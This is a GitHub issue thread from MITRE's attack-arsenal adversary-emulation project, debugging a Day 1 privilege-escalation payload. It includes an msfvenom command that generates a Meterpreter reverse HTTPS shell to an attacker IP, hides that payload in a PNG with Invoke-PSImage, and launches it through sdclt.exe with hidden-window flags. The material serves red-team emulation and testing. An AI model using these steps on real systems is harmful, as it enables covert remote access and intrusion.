### ISSUE TITLE
Day 1: Privilege Escalation Payload

### ISSUE THREAD

**Issue by leegengyu** [mitre-attack/attack-arsenal#6]
# Issue 1
It is stated that the first step to re-create the `monkey.png` is `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 --format psh-cmd -o meterpreter.ps1`.

However, by using `--format psh-cmd`, I was thinking that the output from the command would actually be meant to be ran in a Command Prompt (rather than in a PowerShell). According to a [Rapid7 link about generating PowerShell payloads](https://metasploit.help.rapid7.com/docs/the-payload-generator), "the generated payload for `psh-cmd` format has a `.cmd` extension." Nonetheless, the `psh-cmd` format was stated under the section for PowerShell payloads (which had me puzzled).

Looking deeper into this, we see that the very first word in `meterpreter.ps1` is `%COMSPEC%`:
![image](https://user-images.githubusercontent.com/35021368/84556801-c067a780-ad57-11ea-8f44-17341044f2a2.png)

Subsequently, `meterpreter.ps1` is embedded into a PNG file using `Invoke-PSImage` as mentioned.

From what I understand, in Step 3.B, the one-liner will execute the contents of `meterpreter.ps1` in a PowerShell after extracting it from the pixels of `monkey.png`. The one-liner is only executed towards the end of Step 3.B, when `%windir%\system32\sdclt.exe` is executed.

In this context, this would mean that `%COMSPEC%` is executed in a PowerShell, which resulted in this error on the victim machine (I removed `-noni` and `-window hidden` in this case for debugging purposes):
![image](https://user-images.githubusercontent.com/35021368/84557589-23107180-ad5f-11ea-88fc-7c259c709d8e.png)

To confirm the above, I tried to run it verbatim as `%COMSPEC%`:
![image](https://user-images.githubusercontent.com/35021368/84556829-f73dbd80-ad57-11ea-9c81-5ecf83fd5316.png)

The way to get the environment variable in PowerShell would be `$env:ComSpec`:
![image](https://user-images.githubusercontent.com/35021368/84557640-7256a200-ad5f-11ea-8ce2-7c48a16faa52.png)

In light of the above, I changed the format from `psh-cmd` to `psh`, and I managed to get a Meterpreter session opened.

Should the format be `psh-cmd` (i.e. I missed out something or ran something wrongly, etc.), or is there a typo (i.e. it should be `psh`)?

# Issue 2
I think there is a typo for the `Invoke-PSImage` command.

The current command in `payload_configs.md` is `Invoke-PSImage -Script .\meterpreter.ps1.ps1 -Out .\monkey.png -Image .\monkey.jpg`.

There is an extra `.ps1` in the parameter `-Script`.

**Comment by jcwilliamsATmitre** [comment]
@leegengyu Great catch, thanks! I just submitted a fix but you are correct in both cases.

the `psh-cmd` payload results in `cmd /c powershell.exe...` whereas the `psh` payload uses PowerShell to load kernel32.dll and allocate + execute a new thread.

Thanks again, and definitely let us know if you come across any more!
